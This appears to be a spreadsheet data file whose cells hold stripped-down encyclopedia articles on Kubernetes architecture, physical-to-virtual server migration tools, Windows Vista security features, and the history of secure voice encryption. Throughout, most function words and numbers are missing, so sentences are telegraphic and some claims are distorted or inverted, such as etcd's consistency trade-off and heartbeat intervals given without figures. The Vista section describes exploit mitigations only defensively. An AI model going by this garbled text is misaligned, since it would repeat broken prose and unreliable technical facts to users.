loosely coupled extensible meet different workloads. internal components well extensions containers kubernetes rely kubernetes api. platform exerts control compute storage resources defining resources objects, managed such. kubernetes follows primary/replica architecture. components kubernetes divided manage individual node part control plane. control plane kubernetes master main controlling unit cluster, managing workload directing communication across system. kubernetes control plane consists various components, process, single master node multiple masters supporting high-availability clusters. various components kubernetes control plane follows: etcd persistent, lightweight, distributed, key-value data store coreos developed. reliably stores configuration data cluster, representing overall state cluster given point time. etcd favors consistency availability event network partition (see theorem). consistency crucial correctly scheduling operating services. server serves kubernetes using json http, provides internal external interface kubernetes. server processes validates rest requests updates state objects etcd, thereby allowing clients configure workloads containers across worker nodes. server uses etcd's watch monitor cluster, roll critical configuration changes, restore divergences state cluster back deployer declared. example, deployer specify three instances particular "pod" (see below) need running. etcd stores fact. deployment controller finds instances running (conflicting etcd declaration), schedules creation additional instance pod. scheduler extensible component selects node unscheduled (the basic entity managed scheduler) runs, based resource availability. scheduler tracks resource node ensure workload scheduled excess available resources. purpose, scheduler must know resource requirements, resource availability, user-provided constraints policy directives quality-of-service, affinity anti-affinity requirements, data locality. scheduler's role match resource "supply" workload "demand". controller reconciliation loop drives actual cluster state toward desired state, communicating server create, update, delete resources manages (e.g., pods service endpoints). kind controller replication controller, handles replication scaling running specified number copies across cluster. also handles creating replacement pods underlying node fails. other controllers part core kubernetes system include daemonset controller running exactly every machine subset machines), controller running pods completion, e.g. part batch job. labels selectors part controller's definition specify pods controller manages. controller manager process manages core kubernetes controllers. nodes node, also known worker minion, machine containers (workloads) deployed. every node cluster must container runtime docker, well below-mentioned components, communication primary network configuration containers. kubelet responsible running state node, ensuring containers node healthy. takes care starting, stopping, maintaining application containers organized pods directed control plane. kubelet monitors state pod, desired state, re-deploys node. node status relayed every seconds heartbeat messages primary. once primary detects node failure, replication controller observes state change launches pods healthy nodes. kube-proxy implementation network proxy load balancer, supports service abstraction along networking operation. responsible routing traffic appropriate container based port number incoming request. container resides inside pod. container lowest level micro-service, holds running application, libraries, dependencies. containers exposed world external address. kubernetes supported docker containers since first version. july 2016 container engine added. namespaces kubernetes provides partitioning resources manages non-overlapping sets called namespaces. they intended environments many users spread across multiple teams, projects, even separating environments like development, test, production. pods basic scheduling unit kubernetes pod, consists containers guaranteed co-located node. each kubernetes assigned unique address within cluster, allowing applications ports without risk conflict. within pod, containers reference other. containers running different segment well. however, container within access another container within another pod, address. however, addresses ephemeral; hence application developer never hardcoded addresses specific referencing assigned another address restart. instead, reference service (see below), holds reference target specific address. define volume, local disk directory network disk, expose containers pod. pods managed manually kubernetes api, management delegated controller. such volumes also basis kubernetes features configmaps provide access configuration file system visible container) secrets provide access credentials needed access remote resources securely, providing credentials file system visible authorized containers). daemonsets normally, kubernetes scheduler decides pods. cases, though, could need every single node cluster. this useful cases like collection, ingress controllers, storage services. daemonsets implement kind scheduling. replicasets replicaset’s purpose maintain stable replica pods running given time. such, often used guarantee availability specified number identical pods.the replicasets also said grouping mechanism lets kubernetes maintain number instances declared given pod. definition replicaset uses selector, whose evaluation result identifying pods associated services kubernetes service pods work together, tier multi-tier application. pods constitute service defined label selector. kubernetes provides modes service discovery, using environmental variables using kubernetes dns. service discovery assigns stable address name service, load balances traffic round-robin manner network connections address among pods matching selector (even failures cause pods move machine machine). default service exposed inside cluster (e.g., back pods might grouped service, requests front-end pods load-balanced among them), service also exposed outside cluster (e.g., clients reach front-end pods). volumes file systems kubernetes container provide ephemeral storage, default. this means restart wipe data containers, therefore, form storage quite limiting anything trivial applications. kubernetes volume provides persistent storage exists lifetime itself. this storage also used shared disk space containers within pod. volumes mounted specific mount points within container, defined configuration, cannot mount onto volumes link volumes. volume mounted different points file system tree different containers. configmaps secrets common application challenge deciding store manage configuration information, contain sensitive data. configuration data anything fine-grained individual properties coarse-grained information like entire configuration files json documents. kubernetes provides closely related mechanisms deal need: "configmaps" "secrets", allow configuration changes made without requiring application build. data configmaps secrets made available every single instance application objects bound deployment. secret and/or configmap sent node node requires kubernetes keep memory node. once depends secret configmap deleted, in-memory copy bound secrets configmaps deleted well. data accessible ways: environment variables (which created kubernetes started) available container file system visible within pod. data stored master highly secured machine nobody login access biggest difference secret configmap content data secret base64 encoded. recent versions kubernetes introduced support encryption used well. secrets often used store data like certificates, passwords, pull secrets (credentials work image registries), keys. statefulsets scaling stateless applications matter adding running pods. stateful workloads harder, state needs preserved restarted. application scaled down, state need redistributed. databases example stateful workloads. when high-availability mode, many databases come notion primary instance secondary instances. case, notion ordering instances important. other applications like apache kafka distribute data amongst brokers; hence, broker another. case, notion instance uniqueness important. statefulsets controllers (see above) enforce properties uniqueness ordering amongst instances used stateful applications. replication controllers deployments replicaset declares number instances needed, replication controller manages system number healthy pods running matches number pods declared replicaset (determined evaluating selector). deployments higher level management mechanism replicasets. while replication controller manages scale replicaset, deployments manage happens replicaset whether update rolled out, rolled back, etc. when deployments scaled down, results declaration replicaset changing change declared state managed replication controller. labels selectors kubernetes enables clients (users internal components) attach keys called "labels" object system, pods nodes. correspondingly, "label selectors" queries labels resolve matching objects. when service defined, define label selectors used service router/load balancer select instances traffic routed thus, simply changing labels pods changing label selectors service used control pods traffic don't, used support various deployment patterns like blue-green deployments testing. this capability dynamically control services utilize implementing resources provides loose coupling within infrastructure. example, application's pods labels system tier (with values frontend, backend, example) release_track (with values canary, production, example), operation backend canary nodes label selector, tier=backend release_track=canary just like labels, field selectors also select kubernetes resources. unlike labels, selection based attribute values inherent resource selected, rather user-defined categorization. metadata.name metadata.namespace field selectors present kubernetes objects. other selectors used depend object/resource type. add-ons add-ons operate like application running within cluster: implemented pods services, different implement features kubernetes cluster. pods managed deployments, replicationcontrollers, there many add-ons, list growing. some important are: dns: kubernetes clusters cluster dns; mandatory feature. cluster server, addition server(s) environment, serves records kubernetes services. containers started kubernetes automatically include server searches. this general purpose, web-based kubernetes clusters. allows users manage troubleshoot applications running cluster, well cluster itself. container resource monitoring: providing reliable application runtime, able scale response workloads, means able continuously effectively monitor workload performance. container resource monitoring provides capability recording metrics containers central database, provides browsing data. cadvisor component slave node provides limited metric monitoring capability. there full metrics pipelines well, prometheus, meet monitoring needs. cluster-level logging: logs separate storage lifecycle independent nodes, pods, containers. otherwise, node failures cause loss event data. ability called cluster-level logging, mechanisms responsible saving container logs central store search/browsing interface. kubernetes provides native storage data, integrate many existing logging solutions kubernetes cluster. storage containers emerged make software portable. container contains packages need service. provided file system makes containers extremely portable easy development. container moved development test production relatively configuration changes. historically kubernetes suitable stateless services. however, many applications database, requires persistence, leads creation persistent storage kubernetes. implementing persistent storage containers challenges kubernetes administrators, devops cloud engineers. containers ephemeral, data not, needs ensure data's survival case container termination hardware failure. when deploying containers kubernetes containerized applications, companies often realize need persistent storage. they need provide fast reliable storage databases, root images data used containers. addition landscape, cloud native computing foundation (cncf), published information kubernetes persistent storage including blog helping define container attached storage pattern. this pattern thought uses kubernetes component storage system service.more information relative popularity approaches found cncf's landscape survey well, showed openebs mayadata rook storage orchestration project projects likely evaluation fall 2019.container attached storage type data storage emerged kubernetes gained prominence. container attached storage approach pattern relies kubernetes certain capabilities delivering primarily block, file, object interfaces workloads running kubernetes.common attributes container attached storage include extensions kubernetes, custom resource definitions, kubernetes functions otherwise would separately developed deployed storage data management. examples functionality delivered custom resource definitions kubernetes include retry logic, delivered kubernetes itself, creation maintenance inventory available storage media volumes, typically delivered custom resource definition. component kubernetes control plane server, exposes http invoked parts cluster well users external components. this rest declarative nature. there kinds resources. most resources kubernetes objects. these represent concrete instance concept cluster, like namespace. small number resource types "virtual". these represent operations rather objects, permission check, using "subjectaccessreviews" resource. resources correspond objects represented cluster unique identifiers objects. virtual resources unique identifiers. operators kubernetes extended using custom resources. these resources represent objects part standard kubernetes product. these resources appear disappear running cluster dynamic registration. cluster administrators update custom resources independently cluster. custom controllers another extension mechanism. these interact custom resources, allow true declarative allows lifecycle management custom resource aligned kubernetes designed. combination custom resources custom controllers often referred (kubernetes) operator. case operators capture human operator managing service services implement using automation, declarative supporting automation. human operators look specific applications services deep knowledge system ought behave, deploy react problems. examples problems solved operators include taking restoring backups application's state, handling upgrades application code alongside related changes database schemas extra configuration settings. cluster design principles used define programmatically create, configure, manage kubernetes clusters. this called cluster api. concept embodied using infrastructure software, notion kubernetes cluster infrastructure resource object managed like kubernetes resources. similarly, machines make cluster also treated kubernetes resource. pieces core api, provider implementation. provider implementation consists cloud-provider specific functions kubernetes provide cluster fashion well-integrated cloud-provider's services resources. uses kubernetes commonly used host microservice-based implementation, associated ecosystem tools provide capabilities needed address concerns microservice architecture. available three forms: open source, commercial, managed. open source distributions include original kubernetes, amazon eks-d, openshift, vmware tanzu, mirantis kubernetes engine, d2iq kubernetes platform. managed offerings include gke, oracle container engine kubernetes, amazon elastic kubernetes service, kubernetes service, platform9 managed kubernetes. release timeline support windows chart visualises period release is/was supported also list cluster management software open service mesh references external links official website kubernetes github</t>
  </si>
  <si>
    <t>Physical-to-Virtual</t>
  </si>
  <si>
    <t>computing. physical-to-virtual ("p2v" "p-to-v") involves process decoupling migrating physical server's operating system (os), applications, data physical server virtual-machine guest hosted virtualized platform. methods migration manual user manually creates virtual machine virtual host environment copies files applications data source machine. semi-automated performing migration using tool assists user moving servers physical state virtual machine. microsoft's virtual server 2005 migration toolkit, howto: guideline virtual server migration toolkit (kb555306) vmware provides semi-automated tool called vmware vcenter converter moving physical servers running windows linux virtual environments powered vmware vcenter converter replaces older utilities: importer (bundled vmware workstation) assistant. oracle's virtual linux-based tool allows conversion image existing hard drive microsoft provides sysinternals disk2vhd utility making images windows later systems used windows virtual microsoft virtual server hyper-v. openqrm, open-source datacenter management platform, (and v2p, p2p). storix's bare-metal recovery product (system backup administrator) provides capabilities linux, aix, solaris. fully automated performing migration using tool migrates server network without assistance user. veritas backup exec physical virtual (p2v) conversion (and v2p) feature build backup engine used migrations instant recovery vcontinuum vcontinuum inmage systems automated data protection/migration tool symantec system recovery enables fast, automated conversions quest vconverter example fully automated migration tool p2v. system center virtual machine manager scvmm among many capabilities capability. leostream example fully automated migration tool p2v. platespin migrate example fully automated migration tool (and v2p, p2p). virtuozzo contains automatic (and v2p) migration tools. sanxfer inquinox automated server data migration tool p2v, v2p, complete (server storage) hardware independence. sureedge, migrator sureline systems fully automated server data migration tool p2v, v2vlinux windows server migration, applications, i.e. server, oracle complete hardware independence, cloud independent cloud cloud migration. also physicalization external links manual physical-to-virtual migration description openvz references</t>
  </si>
  <si>
    <t>Security and safety features new to Windows Vista</t>
  </si>
  <si>
    <t>there number security safety features windows vista, available prior microsoft windows operating system release. beginning early 2002 microsoft's announcement trustworthy computing initiative, great deal work gone making windows vista secure operating system predecessors. internally, microsoft adopted "security development lifecycle" underlying ethos "secure design, secure default, secure deployment". code windows vista developed methodology, existing code reviewed refactored improve security. some specific areas windows vista introduces security safety mechanisms include user account control, parental controls, network access protection, built-in anti-malware tool, digital content protection mechanisms. user account control user account control infrastructure requires user consent allowing action requires administrative privileges. with feature, users, including users administrative privileges, standard user mode default, since applications require higher privileges. when action attempted needs administrative privileges, installing software changing system security settings, windows prompt user whether allow action not. user chooses allow, process initiating action elevated higher privilege context continue. while standard users need enter username password administrative account process elevated (over-the-shoulder credentials), administrator choose prompted consent credentials. user click yes, seconds prompt denied. asks credentials secure desktop mode, entire screen faded temporarily disabled, present elevation this prevent spoofing mouse application requesting elevation. application requesting elevation focus switch secure desktop occurs, taskbar icon blinks, focussed, elevation presented (however, possible prevent malicious application silently obtaining focus). since secure desktop allows highest privilege system applications run, user mode application present dialog boxes desktop, prompt elevation consent safely assumed genuine. additionally, also help protect shatter attacks, intercept windows inter-process messages malicious code spoof user interface, preventing unauthorized processes sending messages high privilege processes. process wants send message high privilege process must elevated higher privilege context, uac. applications written assumption user running administrator privileges experienced problems earlier versions windows limited user accounts, often attempted write machine-wide system directories (such program files) registry keys (notably hklm) attempts alleviate using file registry virtualization, redirects writes (and subsequent reads) per-user location within user's profile. example, application attempts write “c:\program files\appname\settings.ini” user permissions write directory, write redirected “c:\users\username\appdata\local\virtualstore\program files\appname\.” encryption bitlocker, formerly known "secure startup", feature offers full disk encryption system volume. using command-line utility, possible encrypt additional volumes. bitlocker utilizes trusted platform module (tpm) version specifications store encryption key. ensures computer running windows vista starts known-good state, also protects data unauthorized access. data volume encrypted full volume encryption (fvek), encrypted volume master (vmk) stored disk itself. windows vista first microsoft windows operating system offer native support providing apis, commands, classes, services management tpm. system service, referred base services, enables access sharing resources developers wish build applications support device.encrypting file system (efs) windows vista used encrypt system page file per-user offline files cache. also tightly integrated enterprise public infrastructure (pki), supports using pki-based recovery, data recovery recovery certificates, combination two. there also group policies require smart cards efs, enforce page file encryption, stipulate minimum lengths efs, enforce encryption user's documents folder, prohibit self-signed certificates. encryption cache cleared user locks workstation certain time limit. rekeying wizard allows user choose certificate select migrate existing files newly chosen certificate. certificate manager also allows users export recovery certificates private keys. users reminded back keys upon first balloon notification. rekeying wizard also used migrate users existing installations software certificates smart cards. wizard also used administrator users recovery situations. this method efficient decrypting reencrypting files. windows firewall windows vista significantly improves firewall address number concerns around flexibility windows firewall corporate environment: ipv6 connection filtering outbound packet filtering, reflecting increasing concerns spyware viruses attempt "phone home". with advanced packet filter, rules also specified source destination addresses port ranges. rules configured services service name chosen list, without needing specify full path file name. ipsec fully integrated, allowing connections allowed denied based security certificates, kerberos authentication, etc. encryption also required kind connection. connection security rule created using wizard handles complex configuration ipsec policies machine. windows firewall allow traffic based whether traffic secured ipsec. management console snap-in named windows firewall advanced security provides access many advanced options, including ipsec configuration, enables remote administration. ability separate firewall profiles computers domain-joined connected private public network. support creation rules enforcing server domain isolation policies. windows defender windows vista includes windows defender, microsoft's anti-spyware utility. according microsoft, renamed 'microsoft antispyware' features scanning system spyware, similar free products market, also includes real time security agents monitor several common areas windows changes caused spyware. these areas include internet explorer configuration downloads, auto-start applications, system configuration settings, add-ons windows windows shell extensions. windows defender also includes ability remove activex applications installed block startup programs. also incorporates spynet network, allows users communicate microsoft, send consider spyware, check applications acceptable. device installation control windows vista allow administrators enforce hardware restrictions group policy prevent users installing devices, restrict device installation predefined white list, restrict access removable media classes devices. parental controls windows vista includes range parental controls administrators monitor restrict computer activity standard user accounts part domain; user account control enforces administrative restrictions. features include: windows vista filter—implemented winsock filter function across browsers—which prohibits access websites based categories content specific addresses (with option block file downloads); time limits, prevents standard users logging date time specified administrator (and locks restricted accounts already logged times); game restrictions, allows administrators block games based names, contents, ratings defined video game content rating system entertainment software rating board (esrb), content restrictions taking precedence rating restrictions (e.g., everyone (e10+) games permitted general, e10+ games mild language still blocked mild language blocked); application restrictions, uses application whitelists specific applications; activity reports, monitors records activities restricted standard user accounts. windows parental controls includes extensible options, application programming interfaces (apis) developers replace bundled features own. exploit protection functionality windows vista uses address space layout randomization (aslr) load system files random addresses memory. default, system files loaded randomly possible locations. other executables specifically header portable executable (pe) file, file format windows executables, aslr. executables, stack heap allocated randomly decided. loading system files random addresses, becomes harder malicious code know privileged system functions located, thereby making unlikely predictably them. this helps prevent remote execution attacks preventing return-to-libc buffer overflow attacks. portable executable format updated support embedding exception handler address header. whenever exception thrown, address handler verified stored executable header. match, exception handled, otherwise indicates run-time stack compromised, hence process terminated. function pointers obfuscated xor-ing random number, actual address pointed hard retrieve. would manually change pointer, obfuscation used pointer would hard retrieve. thus, made hard unauthorized user function pointer able actually also metadata heap blocks xor-ed random numbers. addition, check-sums heap blocks maintained, used detect unauthorized changes heap corruption. whenever heap corruption detected, application killed prevent successful completion exploit. windows vista binaries include intrinsic support detection stack-overflow. when stack overflow windows vista binaries detected, process killed cannot used carry exploit. also windows vista binaries place buffers higher memory buffers, like pointers supplied parameters, lower memory area. actually exploit, buffer underrun needed gain access locations. however, buffer underruns much less common buffer overruns. application isolation windows vista introduces mandatory integrity control integrity levels processes. integrity process access resources higher integrity process. this feature used enforce application isolation, applications medium integrity level, applications running standard user context hook system level processes high integrity level, administrator mode applications hook onto lower integrity processes like windows internet explorer lower privilege process cannot perform window handle validation higher process privilege, cannot sendmessage postmessage higher privilege application windows, cannot thread hooks attach higher privilege process, cannot journal hooks monitor higher privilege process cannot perform dll–injection higher privilege process. data execution prevention windows vista offers full support (no-execute) feature modern processors. introduced windows service pack windows server 2003 service pack this feature, present (evp) amd's amd64 processors (edb) intel's processors, flag certain parts memory containing data instead executable code, prevents overflow errors resulting arbitrary code execution. processor supports nx-bit, windows vista automatically enforces hardware-based data execution prevention processes mark memory pages non-executable data segments (like heap stack), subsequently data prevented interpreted executed code. this prevents exploit code injected data executed. enabled applications, users gain additional resistance zero-day exploits. applications dep-compliant generate exceptions. therefore, enforced applications default 32-bit versions windows turned critical system components. however, windows vista introduces additional policy controls allow software developers enable hardware protection code, independent system-wide compatibility enforcement settings. developers mark applications nx-compliant built, allows protection enforced application installed runs. this enables higher percentage nx-protected code software ecosystem 32-bit platforms, default system compatibility policy configured protect operating system components. x86-64 applications, backward compatibility issue therefore enforced default 64-bit programs. also, processor-enforced used x86-64 versions windows vista greater security. digital rights management digital rights management content-protection features introduced windows vista help digital content providers corporations protect data copied. puma: protected user mode audio (puma) user mode audio (uma) audio stack. provide environment audio playback restricts copying copyrighted audio, restricts enabled audio outputs allowed publisher protected content. protected video path output protection management (pvp-opm) technology prevents copying protected digital video streams, display video devices lack equivalent copy protection (typically hdcp). microsoft claims without restrictions content industry prevent playing copyrighted content refusing issue license keys encryption used dvd, blu-ray disc, copy-protected systems. protected video path user-accessible (pvp-uab) similar pvp-opm, except applies encryption protected content express bus. rights management services (rms) support, technology allow corporations apply drm-like restrictions corporate documents, email, intranets protect copied, printed, even opened people authorized windows vista introduces protected process, differs usual processes sense processes cannot manipulate state process, threads processes introduced protected process enhanced access drm-functions windows vista. however, currently, applications using protected video path create protected processes.the inclusion digital rights management features source criticism windows vista. windows service hardening windows service hardening compartmentalizes services service compromised, cannot easily attack services system. prevents windows services operations file systems, registry networks supposed thereby reducing overall attack surface system preventing entry malware exploiting system services. services assigned per-service security identifier (sid), allows controlling access service access specified security identifier. per-service assigned service installation changeserviceconfig2 using sc.exe command sidtype verb. services also access control lists (acl) prevent external access resources private itself. services windows vista also less privileged account local service network service, instead system account. previous versions windows system services login session locally logged-in user (session windows vista, session reserved services, interactive logins done sessions. this intended help mitigate class exploits windows message-passing system, known shatter attacks. process hosting service privileges specified requiredprivileges registry value hklm\system\currentcontrolset\services. services also need explicit write permissions write resources, per-service basis. using write-restricted access token, resources modified service given write access, trying modify resource fails. services also pre-configured firewall policy, gives much privilege needed function properly. independent software vendors also windows service hardening harden services. windows vista also hardens named pipes used servers prevent processes able hijack them. authentication logon graphical identification authentication (gina), used secure authentication interactive logon replaced credential providers. combined supporting hardware, credential providers extend operating system enable users biometric devices (fingerprint, retinal, voice recognition), passwords, pins smart card certificates, custom authentication package schema third-party developers wish create. smart card authentication flexible certificate requirements relaxed. enterprises develop, deploy, optionally enforce custom authentication mechanisms domain users. credential providers designed support single sign-on (sso), authenticating users secure network access point (leveraging radius technologies) well machine logon. credential providers also designed support application-specific credential gathering, used authentication network resources, joining machines domain, provide administrator consent user account control. authentication also supported using ipv6 services. security service provider, credssp available security support provider interface enables application delegate user's credentials client using client-side ssp) target server (through server-side ssp). credssp also used terminal services provide single sign-on. windows vista authenticate user accounts using smart cards combination passwords smart cards (two-factor authentication). windows vista also smart cards store keys. this makes sure encrypted files accessible long smart card physically available. smart cards used logon, operates single sign-on mode, uses logon smart card file encryption without prompting pin. fast user switching limited workgroup computers windows also enabled computers joined domain, starting windows vista. windows vista also includes authentication support read-only domain controllers introduced windows server 2008. cryptography windows vista features update crypto known cryptography api: next generation (cng). user mode kernel mode includes support elliptic curve cryptography (ecc) number newer algorithms part national security agency (nsa) suite extensible, featuring support plugging custom cryptographic apis runtime. also integrates smart card subsystem including base module implements standard backend cryptographic functions developers smart card manufacturers need, write complex csps. microsoft certificate authority issue certificates certificate client enroll validate sha-2 based certificates. revocation improvements include native support online certificate status protocol (ocsp) providing real-time certificate validity checking, prefetching capi2 diagnostics. certificate enrollment wizard-based, allows users input data enrollment provides clear information failed enrollments expired certificates. certenroll, com-based enrollment replaces xenroll library flexible programmability. credential roaming capabilities replicate active directory pairs, certificates credentials stored stored user names passwords within network. metadata removal remove properties personal information feature allows users remove metadata files sharing protect privacy. supports small number file formats removal limited number properties. however, possible software developer develop extension feature, make support additional file formats properties. criticized limited support file formats metadata elements misleading user interface. network access protection windows vista introduces network access protection (nap), ensures computers connecting communicating network conform required level system health administrator network. depending policy administrator, computers meet requirements either warned granted access, allowed access limited network resources, denied access completely. also optionally provide software updates non-compliant computer upgrade level required access network, using remediation server. conforming client given health certificate, uses access protected resources network. network policy server, running windows server 2008 acts health policy server clients need windows later. server, radius server dhcp server also health policy server. other networking-related security features interfaces tcp/ip security (filtering local host traffic), firewall hook, filter hook, storage packet filter information replaced framework known windows filtering platform (wfp). provides filtering capability layers tcp/ip protocol stack. integrated stack, easier developers build drivers, services, applications must filter, analyze, modify tcp/ip traffic. order provide better security transferring data network, windows vista provides enhancements cryptographic algorithms used obfuscate data. support 256-bit 384-bit elliptic curve diffie–hellman (dh) algorithms, well 128-bit, 192-bit 256-bit advanced encryption standard (aes) included network stack kerberos protocol messages. direct support connections winsock allows socket applications directly control security traffic network (such providing security policy requirements traffic, querying security settings) rather extra code support secure connection. computers running windows vista part logically isolated networks within active directory domain. only computers logical network partition able access resources domain. even though systems physically network, unless logical partition, able access partitioned resources. system part multiple network partitions. schannel includes cipher suites support elliptic curve cryptography, cipher suites negotiated part standard handshake. schannel interface pluggable advanced combinations cipher suites substitute higher level functionality. ipsec fully integrated windows firewall offers simplified configuration improved authentication. ipsec supports ipv6, including support internet exchange (ike), authip data encryption, client-to-dc protection, integration network access protection network diagnostics framework support. increase security deployability ipsec vpns, windows vista includes authip extends cryptographic protocol features like authentication multiple credentials, alternate method negotiation asymmetric authentication. security wireless networks improved better support newer wireless standards like 802.11i (wpa2). transport layer security (eap-tls) default authentication mode. connections made secure connection level supported wireless access point. wpa2 used even mode. windows vista enhances security joining domain wireless network. single sign credentials join wireless network well domain housed within network. case, radius server used peap authentication joining network ms-chap authentication domain. bootstrap wireless profile also created wireless client, first authenticates computer wireless network joins network. stage, machine still access domain resources. machine script, stored either system thumb drive, authenticates domain. authentication done whether using username password combination security certificates public infrastructure (pki) vendor verisign. windows vista also includes extensible authentication protocol host (eaphost) framework provides extensibility authentication methods commonly used protected network access technologies 802.1x ppp. allows networking vendors develop easily install authentication methods known methods. windows vista supports peap pptp. authentication mechanisms supported peapv0/eap-mschapv2 (passwords) peap-tls (smartcards certificates). windows vista service pack includes secure socket tunneling protocol, microsoft proprietary protocol provides mechanism transport point-to-point protocol (ppp) traffic (including ipv6 traffic) channel. x86-64-specific features 64-bit versions windows vista enforce hardware-based data execution prevention (dep), fallback software emulation. this ensures less effective software-enforced (which safe exception handling unrelated bit) used. also, dep, default, enforced 64-bit applications services x86-64 versions 32-bit applications contrast, 32-bit versions, software-enforced available option default enabled essential system components. upgraded kernel patch protection, also referred patchguard, prevents third-party software, including kernel-mode drivers, modifying kernel, data structure used kernel, way; modification detected, system shut down. this mitigates common tactic used rootkits hide user-mode applications. patchguard first introduced edition windows server 2003 service pack included windows professional edition. kernel-mode drivers 64-bit versions windows vista must digitally signed; even administrators able install unsigned kernel-mode drivers. boot-time option available disable check single session windows. 64-bit user-mode drivers required digitally signed. code integrity check-sums signed code. before loading system binaries, verified check-sum ensure modified. binaries verified looking signatures system catalogs. windows vista boot loader checks integrity kernel, hardware abstraction layer (hal), boot-start drivers. aside kernel memory space, code integrity verifies binaries loaded protected process system installed dynamic libraries implement core cryptographic functions. other features changes number specific security reliability changes made: stronger encryption used storing secrets (cached domain records, passwords, encryption keys, local security policy, auditing etc.) support ieee 1667 authentication standard flash drives hotfix windows vista service pack kerberos updated support encryption. schannel also stronger encryption support. software restriction policies introduced windows improved windows vista. basic user security level exposed default instead hidden. default hash rule algorithm upgraded stronger sha256. certificate rules enabled enforcement property dialog within software restriction policies snap-in extension. prevent accidental deletion windows, vista allow formatting boot partition active (right-clicking drive choosing "format", typing "format (w/o quotes) command prompt yield message saying formatting volume allowed). format main hard drive (the drive containing windows), user must boot computer windows installation disc choose menu item "repair your computer" advanced system recovery options pressing upon turning computer. additional settings allow configuring encryption policies updated, whether files moved encrypted folders encrypted, offline files cache files encryption whether encrypted items indexed windows search. stored user names passwords (credentials manager) feature includes wizard back user names passwords file restore systems running windows vista later operating systems. policy setting group policy enables display date time last successful interactive logon, number failed logon attempts since last successful logon user name. this enable user determine account used without knowledge. policy enabled local users well computers joined functional-level domain. windows resource protection prevents potentially damaging system configuration changes, preventing changes system files settings process windows installer. also, changes registry unauthorized software blocked. protected-mode internet explorer: internet explorer later introduce several security changes phishing filter, activex opt-in, handling protection, protection cross-domain scripting attacks status-bar spoofing. they integrity process windows vista, write temporary internet files folder, cannot gain write access files registry keys user's profile, protecting user malicious content security vulnerabilities, even activex controls. also, internet explorer later secure data protection (dpapi) store credentials passwords instead less secure protected storage (pstore). network location awareness integration windows firewall. newly connected networks defaulted "public location" locks listening ports services. network marked trusted, windows remembers setting future connections network. user-mode driver framework prevents drivers directly accessing kernel instead access dedicated api. this feature important majority system crashes traced improperly installed third-party device drivers. windows security center upgraded detect report presence anti-malware software well monitor restore several internet explorer security settings user account control. anti-virus software integrates security center, presents solution problems user interface. also, windows calls added applications retrieve aggregate health status windows security center, receive notifications health status changes. protected storage (pstore) deprecated therefore made read-only windows vista. microsoft recommends using dpapi pstore data items manage existing ones. internet explorer later also dpapi instead pstore store credentials. built-in administrator account disabled default clean installation windows vista. cannot accessed safe mode long least additional local administrator account. also computer security references external links vista vulnerabilities securityfocus</t>
  </si>
  <si>
    <t>Secure voice</t>
  </si>
  <si>
    <t>secure voice (alternatively secure speech ciphony) term cryptography encryption voice communication range communication types radio, telephone history implementation voice encryption dates back world secure communication paramount armed forces. during time, noise simply added voice signal prevent enemies listening conversations. noise added playing record noise sync voice signal voice signal reached receiver, noise signal subtracted out, leaving original voice signal. order subtract noise, receiver need exactly noise signal noise records made pairs; transmitter receiver. having copies records made impossible wrong receiver decrypt signal. implement system, army contracted bell laboratories developed system called sigsaly. with sigsaly, channels used sample voice frequency spectrum channels allocated sample voice pitch background hiss. time sigsaly, transistor developed digital sampling done circuits using model 2051 thyratron vacuum tube. each sigsaly terminal used racks equipment weighing tons filled large room. this equipment included radio transmitters receivers large phonograph turntables. voice keyed 410-millimetre vinyl phonograph records contained frequency shift keying (fsk) audio tone. records played large precise turntables sync voice transmission. from introduction voice encryption today, encryption techniques evolved drastically. digital technology effectively replaced analog methods voice encryption using complex algorithms, voice encryption become much secure efficient. relatively modern voice encryption method sub-band coding. with sub-band coding, voice signal split multiple frequency bands, using multiple bandpass filters cover specific frequency ranges interest. output signals bandpass filters lowpass translated reduce bandwidth, reduces sampling rate. lowpass signals quantized encoded using special techniques like, pulse-code modulation (pcm). after encoding stage, signals multiplexed sent along communication network. when signal reaches receiver, inverse operations applied signal back original state. speech scrambling system developed bell laboratories 1970s subhash nikil jayant. system permutation matrices used scramble coded representations (such pulse-code modulation variants) speech data. motorola developed voice encryption system called digital voice protection (dvp) part first generation voice encryption techniques. uses self-synchronizing encryption technique known cipher feedback (cfb). extremely high number possible keys associated early algorithm, makes algorithm robust gives high level security. symmetric keyed encryption systems, encryption required decrypt signal special decryption algorithm. digital digital secure voice usually includes components, digitizer convert speech digital signals encryption system provide confidentiality. difficult practice send encrypted signal voiceband communication circuits used transmit unencrypted voice, e.g. analog telephone lines mobile radios, bandwidth expansion. this voice coders (vocoders) achieve tight bandwidth compression speech signals. nsa's stu-iii, ky-57 scip examples systems operate existing voice circuits. system, contrast, requires wide bandwidth isdn lines normal mode operation. encrypting voip, natively digital, standard protocol zrtp could used end-to-end encryption technology. secure voice's robustness greatly benefits voice data compressed bit-rates special component called speech coding, voice compression voice coder (also known vocoder). secure voice compression standards include (cvsd, celp, lpc-10e melp, latest standard state melpe algorithm. digital methods using voice compression: melp melpe melpe enhanced-melp (mixed excitation linear prediction) united states department defense speech coding standard used mainly military applications satellite communications, secure voice, secure radio devices. development supported nsa, nato. government's melpe secure voice standard also known mil-std-3005, nato's melpe secure voice standard also known stanag-4591. initial melp invented alan mccree around 1995. that initial speech coder standardized 1997 known mil-std-3005. surpassed candidate vocoders competition, including: frequency selective harmonic coder (fshc), advanced multi-band excitation (ambe), enhanced multiband excitation (embe), sinusoid transform coder (stc), subband coder (sbc). lower complexity waveform interpolative (wi) coder, melp vocoder competition selected mil-std-3005. between 1998 2001, melp-based vocoder created half rate (i.e. 1200 bit/s) substantial enhancements added mil-std-3005 signalcom (later acquired microsoft), at&amp;t corporation, compandent included additional vocoder half rate (i.e. 1200 bit/s), substantially improved encoding (analysis), substantially improved decoding (synthesis), noise-preprocessing removing background noise, transcoding 2400 bit/s 1200 bit/s bitstreams, postfilter. this fairly significant development aimed create coder half rate interoperable melp standard. this enhanced-melp (also known melpe) adopted mil-std-3005 2001 form annexes supplements made original mil-std-3005, enabling quality 2400 bit/s melp's half rate. greatest advantages 2400 bit/s melpe shares format melp, hence interoperate legacy melp systems, would deliver better quality ends. melpe provides much better quality older military standards, especially noisy environments battlefield vehicles aircraft. 2002, following extensive competition testing, 2400 1200 bit/s melpe adopted also nato standard, known stanag-4591. part nato testing nato standard, melpe tested candidates france's (harmonic stochastic excitation) turkey's sb-lpc (split-band linear predictive coding), well secure voice standards fs1015 lpc-10e (2.4 kbit/s), fs1016 celp (4.8 kbit/s) cvsd kbit/s). subsequently, melpe also nato competition, surpassing quality candidates well quality secure voice standards (cvsd, celp lpc-10e). nato competition concluded melpe substantially improved performance terms speech quality, intelligibility, noise 